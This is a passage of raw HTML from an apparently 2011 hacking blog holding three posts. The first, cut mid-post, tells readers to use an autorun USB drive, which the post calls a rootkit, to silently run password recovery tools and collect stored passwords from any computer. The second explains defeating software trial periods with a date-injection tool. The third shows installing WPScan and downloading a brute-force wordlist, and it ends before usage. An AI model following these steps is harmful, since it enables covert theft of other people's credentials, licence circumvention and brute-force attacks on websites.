0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> launch.bat</strong> file also to your USB drive.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps</div><ins style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-style: initial; border-top-style: none; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_3_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_3" marginheight="0" marginwidth="0" name="aswift_3" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. In the pop-up window, select the first option (<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Perform a Virus Scan</strong>).</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> .TXT</strong> files.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">4. Remove the pendrive and you’ll see the stored passwords in the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">.TXT</strong> files.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">NOTE</strong>: This procedure will only recover the stored passwords (if any) on the Computer.</div><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="border-color: initial; border-color: initial; border-style: initial; border-width: initial; font-style: inherit; height: 60px;"><ins style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"></ins></span></span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-69648513937897823612011-07-29T09:31:00.001-07:002011-07-29T09:31:57.991-07:00How to Hack Software and run Trial Program Forever<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"><span class="Apple-style-span" style="color: yellow;"></span></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">We can run any trial software for ever.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">Strange!!!</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">just read on..</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?<br style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Installed Date and Time</strong>, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;"><a href="http://www.nirsoft.net/utils/run_as_date.html" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">RunAsDate</strong></a> intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista. (havent tried it with Windows 7)</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">NOTE: FOLLOW THESE TIPS CAREFULLY</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">1. Note down the date and time, when you install the software for the first time.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">2. Once the trial period expires, you must always run the software using RunAsDate.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">3. After the trial period is expired, do not run the software(program) directly. If you run the software <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">directly</strong>even once, this hack may no longer work.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">4. It is better and safe to inject the date of the last day in the trial period.</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="color: yellow;">For example, if the trial period expires on <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Apr 30 2011</strong>, always inject the date as <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Apr 29 2011 </strong>in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.</span></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com1tag:blogger.com,1999:blog-4622788998166863521.post-260288417539463452011-07-29T09:13:00.000-07:002011-07-29T09:15:24.466-07:00WPScan – WordPress Security Scanner<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDf50OCVIfZYmJVt249Kz3dgQLDTJ7d0VjBEojv71M4HCdU0LYiDX4Iv_E5PF7zjfJ_sRa8j25yr3cNqfAfvusbv9NpfgyaCSKpAjQMUErGZF_A74yXWhb0Z-zYuNSo9_NVip_zcIs4kI/s1600/How-to-hack-wordpress.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDf50OCVIfZYmJVt249Kz3dgQLDTJ7d0VjBEojv71M4HCdU0LYiDX4Iv_E5PF7zjfJ_sRa8j25yr3cNqfAfvusbv9NpfgyaCSKpAjQMUErGZF_A74yXWhb0Z-zYuNSo9_NVip_zcIs4kI/s1600/How-to-hack-wordpress.jpg" /></a></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: yellow; font-size: medium; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">What is WPScan?</span></strong></span></div><span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"></span><br />
<div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">WPScan is wonderful and super fast wordpress vulnerability scanner written in ruby language, sponsored by<a href="http://www.randomstorm.com/" rel="nofollow" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;">RandomStorm</a> and hosted by <a href="http://code.google.com/p/wpscan/" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" target="_blank" title="WPScan on Googlecode">Googlecode</a>. It provides you an easy way to penetrate wordpress blogs using blackbox techniques.</span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">You can find the following stuff about any wordpress blog using this ruby application:</span></div><ul style="font-size: 12px; list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 1.667em; margin-left: 1.667em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">List of plugins</span></li>
<span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Name of theme</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Bruce forcing Weak Password for specific user</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Brute force username</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Directory listings</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Version details</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Possible vulnerabilities.</li>
</span></ul><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: yellow; font-size: medium; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">How to Install WPScan?</span></strong></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">Before you install WPScan, you have to install number of dependencies essential by this tiny ruby application. BTW i am using BackTrack5 Linux.</span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: yellow; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Dependencies :</strong></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">apt-get install libcurl4-gnutls-dev<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />gem install --user-install mime-types<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />gem install --user-install xml-simple<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />gem install --user-install typhoeus</code></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">WPScan Installation :</strong></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">cd /pentest/web/<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />wget http://wpscan.googlecode.com/files/wpscan-1.0.zip<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />unzip wpscan-1.0.zip<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />cd wpscan</code></span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"></strong></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #cc0000; font-size: medium; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">How to use WPScan?</span></strong></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">It is almost cooked. One more thing we need here; is to download keywords database which will be used for brute forcing.</span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><code style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 1em; line-height: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">wget http://static.hackersgarage.com/darkc0de.lst.gz<br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />gunzip darkc0de.lst.gz</code></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Example usage of this ant application :</strong></span></div><div style="font-size: 12px; margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="color: #cc0000; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; line-height: 20px;">Do ‘non-intrusive’ checks…</span><br />
